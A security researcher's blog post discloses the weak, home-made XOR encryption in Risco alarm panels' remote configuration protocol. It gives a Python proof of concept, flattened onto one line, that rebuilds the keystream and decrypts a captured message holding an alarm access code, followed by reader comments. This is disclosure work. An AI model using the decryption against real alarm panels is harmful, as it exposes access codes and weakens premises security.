During a routine pen-test of an alarm receiving centre, a piece of software was found that was used to remotely configure Risco alarms.
This software communicates with alarm panels, sometimes over IP, sometimes over a mobile network. One of these panels is the Lightsys panel, which seems fairly common in the UK.
The encryption used by this protocol is token at best, and not suitable for securing communication across an untrusted network.
The protocol generates a psuedo-random sequence of numbers using a basic function. This is then XORed with the message to encrypt or decrypt.
Each panel has a “seed” that changes the encryption slightly. Because we have a partially known plaintext, you don’t need to know the seed to decrypt messages – it can just be determined. The seed tended to be the same across many panels.
numTable = [2, 4, 16, 32768] PRNG_output = [] # This is the "Remote ID code" in the software seed = 2 for i in range(0,255): bit = 0 for j in range(0, 4): if (seed & numTable[j]) > 0: bit ^= 1 seed = seed << 1 | bit PRNG_output.append(seed & 255) # This has been captured from the network by tricking software into encrypting # Message is 02RMT=1234 8EBC # 02 is sequence number # RMT is a command # 1234 is the access code msg = '353945620a804bc6dbe4b67ac0495503'.decode('hex') plain = '' for i in range(0, len(msg)): plain += chr(ord(msg[i]) ^ PRNG_output[i]) print "Decrypted message: %s" % plain
A further proof of concept was developed that can send and receive commands with alarms, leading to a denial-of-service condition. I am not disclosing this as it can cause harm and is not the root cause of the problem.
This was reported to Risco on 7th August. As of yet, they have not indicated if they wish to fix this issue.
Conclusion
- Don’t roll your own encryption
- If you have a key, make sure it has enough length to actually improve security
Luca
June 8, 2018 at 4:55pmHi ! Interesting article… I’m trying to access to my risco panel with a serial connection and decrypt data… Can you say me if your method is still applicable ? I tried but none…
cybergibbons
June 13, 2018 at 8:46amSorry – really not sure! I didn’t really look at the serial side.
Luca
June 13, 2018 at 8:49amOh, serial or ip connection, the same… this article still works on the ip connection ?
Marco
July 13, 2018 at 1:36pmHi,
I’m interested in hooking up a Linux monitor on my RISCO bus.
Did you make any progress with the decryption part?
I still have to figure out the serial part though…
Tozman
September 16, 2018 at 8:18pmThere is a “debug” mode in their software, you can see the datas being sent.
Hd
August 31, 2019 at 12:32pmTrying to do the same for better integration with my system. So far I just had some time to hook up serial and sniffer on cs communication. Not really looked at the data yet
John Tunnicliffe
January 16, 2021 at 4:37pmLuca, did you get anywhere with this? I am using your extension to Home Assistant that uses the Risco Cloud. However, that becomes a paid subscription soon, so I started to investigate alternatives.